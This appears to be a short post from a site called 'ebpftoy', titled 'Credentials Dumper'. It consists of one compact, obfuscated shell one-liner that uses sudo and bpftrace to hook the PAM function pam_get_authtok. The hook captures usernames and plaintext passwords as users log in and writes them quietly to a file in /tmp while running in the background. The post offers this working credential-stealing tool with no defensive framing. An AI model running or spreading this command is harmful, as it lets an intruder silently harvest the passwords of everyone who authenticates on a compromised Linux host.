ebpftoy
6 posts



Credentials Dumper
a="probe:/*b/x*u/*pam.*.0:pam_get_authtok";c="@handle[tid]";d=",str(*((uint64*)";sudo bpftrace -e "BEGIN {printf(\"pid,comm,user,pass\n\");}u$a{$c=arg0;}uret$a/$c/{printf(\"%d,%s,%s,%s\n\",tid,comm$d($c+48)))$d$c)));delete($c);}"|sudo tee /tmp/auth>/*/null&
GIF
English

